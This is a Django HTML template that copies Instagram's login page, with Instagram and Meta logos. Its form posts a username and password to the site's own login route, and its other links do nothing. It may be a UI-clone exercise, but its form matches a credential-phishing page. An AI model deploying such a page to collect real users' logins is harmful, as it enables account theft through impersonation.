
{% load static %}

<!DOCTYPE html>
<html lang="en">

<head>

    <meta charset="UTF-8">

    <meta name="viewport"
          content="width=device-width,
                   initial-scale=1.0,
                   maximum-scale=1.0,
                   user-scalable=no">

    <title>Instagram</title>

    <link rel="stylesheet"
          href="{% static 'css/style.css' %}">

</head>


<body>

<div class="page">

    <div class="login-box">


        <!-- =====================================
             LANGUAGE
        ====================================== -->

        <div class="language">
            English (UK)
        </div>


        <!-- =====================================
             LOGO
        ====================================== -->

        <div class="logo-wrapper">

            <img
                src="{% static 'img/insta_form_logo.png' %}"
                alt="Instagram Logo"
                class="instagram-logo"
            >

        </div>


        <!-- =====================================
             LOGIN CONTENT
        ====================================== -->

        <div class="login-content">


            <!-- =====================================
                 LOGIN FORM
            ====================================== -->

            <form
                id="loginForm"
                method="POST"
                action="{% url 'login' %}"
            >

                {% csrf_token %}


                <!-- USERNAME -->

                <input
                    type="text"
                    id="username"
                    name="username"
                    class="login-input"
                    placeholder="Username, email address or mobile number"
                    autocomplete="off"
                >


                <!-- PASSWORD -->

                <input
                    type="password"
                    id="password"
                    name="password"
                    class="login-input password"
                    placeholder="Password"
                    autocomplete="off"
                >


                <!-- LOGIN BUTTON -->

                <button
                    id="loginButton"
                    class="login-button"
                    type="submit"
                    disabled
                >
                    Log in
                </button>

            </form>


            <!-- =====================================
                 FORGOTTEN PASSWORD
            ====================================== -->

            <a href="#" class="forgot">
                Forgotten password?
            </a>


            <!-- =====================================
                 CREATE ACCOUNT
            ====================================== -->

            <button
                type="button"
                class="create-account"
            >
                Create new account
            </button>


            <!-- =====================================
                 META
            ====================================== -->

            <div class="meta">

                <img
                    src="{% static 'img/meta.ico.svg' %}"
                    class="meta-icon"
                    alt="Meta"
                >

            </div>


        </div>

    </div>

</div>


<!-- =====================================
     JAVASCRIPT
====================================== -->

<script src="{% static 'js/button.js' %}"></script>

</body>

</html>

